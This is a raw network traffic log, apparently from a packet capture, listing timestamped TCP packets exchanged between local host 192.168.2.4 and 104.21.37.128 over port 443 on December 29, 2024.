                                                                                                                                                  Dec 29, 2024 16:37:16.259010077 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.259038925 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.264691114 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.264712095 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.264774084 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.264780998 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.264822960 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.270735025 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.270751953 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.270809889 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.270817041 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.270859957 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.271671057 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.271725893 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.276895046 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.276909113 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.276973963 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.276984930 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.277029037 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.283282042 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.283299923 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.283360004 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.283384085 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.283421993 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.288594007 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.288614035 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.288765907 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.288789988 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.288836956 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.294524908 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.294539928 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.294596910 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.294617891 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.294655085 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.457807064 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.457833052 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.457899094 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.457925081 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.457956076 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.457963943 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.462287903 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.462304115 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.462373018 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.462379932 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.462423086 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.468324900 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.468339920 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.468408108 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.468415022 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.468456030 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.474282026 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.474297047 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.474356890 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.474364042 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.474405050 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.479620934 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.479635000 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.479698896 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.479706049 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.479751110 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.485969067 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.485984087 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.486047983 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.486053944 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.486097097 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.491269112 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.491283894 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.491348982 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.491354942 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.491396904 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.497266054 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.497279882 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.497340918 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.497347116 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.497386932 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.659327984 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.659363031 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.659439087 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.659466982 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.659528971 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.663712025 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.663727999 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.663798094 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.663805962 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.663856983 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.669759989 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.669775963 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.669842005 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.669848919 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.669892073 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.675668001 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.675687075 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.675757885 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.675765038 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.675802946 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.681716919 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.681734085 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.681790113 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.681797028 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.681834936 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.687378883 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.687397003 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.687438011 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.687443972 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.687494040 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.687560081 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.692660093 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.692675114 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.692728043 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.692734957 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.692784071 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.698704958 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.698721886 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.698777914 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.698785067 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.698909998 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.860353947 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.860383034 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.860445976 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.860464096 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.860485077 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.860508919 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.865772963 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.865787983 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.865845919 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.865853071 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.865892887 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.871037960 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.871053934 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.871115923 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.871121883 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.871167898 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.876990080 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.877005100 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.877065897 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.877073050 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.877115965 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.883044004 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.883059025 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.883122921 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.883128881 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.883172035 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.888652086 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.888667107 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.888731003 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.888737917 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.888777971 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.894690990 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.894706011 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.894756079 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.894762993 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.894812107 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.900065899 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.900079966 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.900142908 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:16.900149107 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:16.900191069 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.061737061 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.061774969 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.061949968 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.061971903 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.062030077 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.067137957 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.067157984 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.067231894 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.067239046 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.067277908 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.072437048 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.072453976 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.072525978 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.072531939 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.072576046 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.078349113 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.078367949 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.078429937 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.078437090 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.078480005 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.084415913 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.084434032 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.084496975 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.084503889 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.084546089 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.090028048 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.090044022 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.090110064 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.090116024 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.090157032 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.096066952 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.096085072 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.096147060 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.096153021 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.096196890 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.101536036 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.101576090 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.101649046 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.101655006 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.101701021 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.263461113 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.263511896 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.263705015 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.263724089 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.263767004 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.268477917 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.268495083 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.268563986 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.268570900 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.268614054 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.274522066 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.274538040 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.274604082 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.274610043 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.274650097 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.280451059 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.280466080 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.280523062 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.280529022 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.280569077 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.285697937 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.285715103 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.285784960 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.285792112 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.285842896 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.292131901 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.292148113 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.292212963 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.292217970 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.292257071 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.297444105 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.297460079 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.297534943 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.297540903 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.297585964 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.303476095 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.303493023 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.303548098 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.303554058 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.303599119 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.309762001 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.464874029 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.464920998 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.464981079 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.464992046 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.465042114 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.470159054 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.470179081 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.470242977 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.470247984 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.470297098 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.475474119 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.475491047 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.475572109 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.475578070 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.475630045 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.481486082 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.481503963 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.481558084 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.481564999 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.481606960 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.487452984 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.487473965 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.487534046 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.487541914 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.487595081 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.493155956 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.493177891 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.493242025 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.493248940 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.493288994 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.499109983 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.499129057 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.499187946 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.499193907 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.499236107 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.504415989 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.504434109 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.504506111 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.504528046 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.504570961 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.666296959 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.666321993 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.666374922 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.666410923 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.666429043 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.666456938 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.671515942 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.671533108 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.671608925 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.671618938 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.671669960 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.676829100 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.676842928 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.676908016 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.676917076 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.676961899 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.682863951 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.682878971 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.682938099 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.682946920 CET44349750104.21.37.128192.168.2.4
                                                                                                                                                  Dec 29, 2024 16:37:17.682991982 CET49750443192.168.2.4104.21.37.128
                                                                                                                                                  Dec 29, 2024 16:37:17.688886881 CET44349750104.21.37.128192.168.2.4
